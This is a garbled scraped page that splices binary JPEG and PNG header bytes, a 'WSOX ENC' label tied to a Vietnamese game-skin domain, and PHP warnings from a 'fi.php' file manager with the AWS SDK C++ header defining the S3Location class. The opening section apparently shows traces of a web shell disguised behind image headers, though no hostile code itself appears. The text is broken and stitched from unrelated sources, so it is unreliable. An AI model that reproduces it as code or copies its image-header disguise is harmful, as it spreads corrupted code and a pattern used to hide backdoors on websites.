1:45 PM 11/12/2025 ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!
Warning: Undefined variable $authorization in C:\xampp\htdocs\demo\fi.php on line 57

Warning: Undefined variable $translation in C:\xampp\htdocs\demo\fi.php on line 118

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\demo\fi.php on line 119

Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\xampp\htdocs\demo\fi.php on line 120

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 247

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 248

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 249

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 250

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 251

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 252
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include #include #include #include #include #include #include #include #include #include namespace Aws { namespace Utils { namespace Xml { class XmlNode; } // namespace Xml } // namespace Utils namespace S3 { namespace Model { /** *

Describes an Amazon S3 location that will receive the results of the restore * request.

See Also:

AWS API * Reference

*/ class S3Location { public: AWS_S3_API S3Location(); AWS_S3_API S3Location(const Aws::Utils::Xml::XmlNode& xmlNode); AWS_S3_API S3Location& operator=(const Aws::Utils::Xml::XmlNode& xmlNode); AWS_S3_API void AddToNode(Aws::Utils::Xml::XmlNode& parentNode) const; ///@{ /** *

The name of the bucket where the restore results will be placed.

*/ inline const Aws::String& GetBucketName() const{ return m_bucketName; } inline bool BucketNameHasBeenSet() const { return m_bucketNameHasBeenSet; } inline void SetBucketName(const Aws::String& value) { m_bucketNameHasBeenSet = true; m_bucketName = value; } inline void SetBucketName(Aws::String&& value) { m_bucketNameHasBeenSet = true; m_bucketName = std::move(value); } inline void SetBucketName(const char* value) { m_bucketNameHasBeenSet = true; m_bucketName.assign(value); } inline S3Location& WithBucketName(const Aws::String& value) { SetBucketName(value); return *this;} inline S3Location& WithBucketName(Aws::String&& value) { SetBucketName(std::move(value)); return *this;} inline S3Location& WithBucketName(const char* value) { SetBucketName(value); return *this;} ///@} ///@{ /** *

The prefix that is prepended to the restore results for this request.

*/ inline const Aws::String& GetPrefix() const{ return m_prefix; } inline bool PrefixHasBeenSet() const { return m_prefixHasBeenSet; } inline void SetPrefix(const Aws::String& value) { m_prefixHasBeenSet = true; m_prefix = value; } inline void SetPrefix(Aws::String&& value) { m_prefixHasBeenSet = true; m_prefix = std::move(value); } inline void SetPrefix(const char* value) { m_prefixHasBeenSet = true; m_prefix.assign(value); } inline S3Location& WithPrefix(const Aws::String& value) { SetPrefix(value); return *this;} inline S3Location& WithPrefix(Aws::String&& value) { SetPrefix(std::move(value)); return *this;} inline S3Location& WithPrefix(const char* value) { SetPrefix(value); return *this;} ///@} ///@{ inline const Encryption& GetEncryption() const{ return m_encryption; } inline bool EncryptionHasBeenSet() const { return m_encryptionHasBeenSet; } inline void SetEncryption(const Encryption& value) { m_encryptionHasBeenSet = true; m_encryption = value; } inline void SetEncryption(Encryption&& value) { m_encryptionHasBeenSet = true; m_encryption = std::move(value); } inline S3Location& WithEncryption(const Encryption& value) { SetEncryption(value); return *this;} inline S3Location& WithEncryption(Encryption&& value) { SetEncryption(std::move(value)); return *this;} ///@} ///@{ /** *

The canned ACL to apply to the restore results.

*/ inline const ObjectCannedACL& GetCannedACL() const{ return m_cannedACL; } inline bool CannedACLHasBeenSet() const { return m_cannedACLHasBeenSet; } inline void SetCannedACL(const ObjectCannedACL& value) { m_cannedACLHasBeenSet = true; m_cannedACL = value; } inline void SetCannedACL(ObjectCannedACL&& value) { m_cannedACLHasBeenSet = true; m_cannedACL = std::move(value); } inline S3Location& WithCannedACL(const ObjectCannedACL& value) { SetCannedACL(value); return *this;} inline S3Location& WithCannedACL(ObjectCannedACL&& value) { SetCannedACL(std::move(value)); return *this;} ///@} ///@{ /** *

A list of grants that control access to the staged results.

*/ inline const Aws::Vector& GetAccessControlList() const{ return m_accessControlList; } inline bool AccessControlListHasBeenSet() const { return m_accessControlListHasBeenSet; } inline void SetAccessControlList(const Aws::Vector& value) { m_accessControlListHasBeenSet = true; m_accessControlList = value; } inline void SetAccessControlList(Aws::Vector&& value) { m_accessControlListHasBeenSet = true; m_accessControlList = std::move(value); } inline S3Location& WithAccessControlList(const Aws::Vector& value) { SetAccessControlList(value); return *this;} inline S3Location& WithAccessControlList(Aws::Vector&& value) { SetAccessControlList(std::move(value)); return *this;} inline S3Location& AddAccessControlList(const Grant& value) { m_accessControlListHasBeenSet = true; m_accessControlList.push_back(value); return *this; } inline S3Location& AddAccessControlList(Grant&& value) { m_accessControlListHasBeenSet = true; m_accessControlList.push_back(std::move(value)); return *this; } ///@} ///@{ /** *

The tag-set that is applied to the restore results.

*/ inline const Tagging& GetTagging() const{ return m_tagging; } inline bool TaggingHasBeenSet() const { return m_taggingHasBeenSet; } inline void SetTagging(const Tagging& value) { m_taggingHasBeenSet = true; m_tagging = value; } inline void SetTagging(Tagging&& value) { m_taggingHasBeenSet = true; m_tagging = std::move(value); } inline S3Location& WithTagging(const Tagging& value) { SetTagging(value); return *this;} inline S3Location& WithTagging(Tagging&& value) { SetTagging(std::move(value)); return *this;} ///@} ///@{ /** *

A list of metadata to store with the restore results in S3.

*/ inline const Aws::Vector& GetUserMetadata() const{ return m_userMetadata; } inline bool UserMetadataHasBeenSet() const { return m_userMetadataHasBeenSet; } inline void SetUserMetadata(const Aws::Vector& value) { m_userMetadataHasBeenSet = true; m_userMetadata = value; } inline void SetUserMetadata(Aws::Vector&& value) { m_userMetadataHasBeenSet = true; m_userMetadata = std::move(value); } inline S3Location& WithUserMetadata(const Aws::Vector& value) { SetUserMetadata(value); return *this;} inline S3Location& WithUserMetadata(Aws::Vector&& value) { SetUserMetadata(std::move(value)); return *this;} inline S3Location& AddUserMetadata(const MetadataEntry& value) { m_userMetadataHasBeenSet = true; m_userMetadata.push_back(value); return *this; } inline S3Location& AddUserMetadata(MetadataEntry&& value) { m_userMetadataHasBeenSet = true; m_userMetadata.push_back(std::move(value)); return *this; } ///@} ///@{ /** *

The class of storage used to store the restore results.

*/ inline const StorageClass& GetStorageClass() const{ return m_storageClass; } inline bool StorageClassHasBeenSet() const { return m_storageClassHasBeenSet; } inline void SetStorageClass(const StorageClass& value) { m_storageClassHasBeenSet = true; m_storageClass = value; } inline void SetStorageClass(StorageClass&& value) { m_storageClassHasBeenSet = true; m_storageClass = std::move(value); } inline S3Location& WithStorageClass(const StorageClass& value) { SetStorageClass(value); return *this;} inline S3Location& WithStorageClass(StorageClass&& value) { SetStorageClass(std::move(value)); return *this;} ///@} private: Aws::String m_bucketName; bool m_bucketNameHasBeenSet = false; Aws::String m_prefix; bool m_prefixHasBeenSet = false; Encryption m_encryption; bool m_encryptionHasBeenSet = false; ObjectCannedACL m_cannedACL; bool m_cannedACLHasBeenSet = false; Aws::Vector m_accessControlList; bool m_accessControlListHasBeenSet = false; Tagging m_tagging; bool m_taggingHasBeenSet = false; Aws::Vector m_userMetadata; bool m_userMetadataHasBeenSet = false; StorageClass m_storageClass; bool m_storageClassHasBeenSet = false; }; } // namespace Model } // namespace S3 } // namespace Aws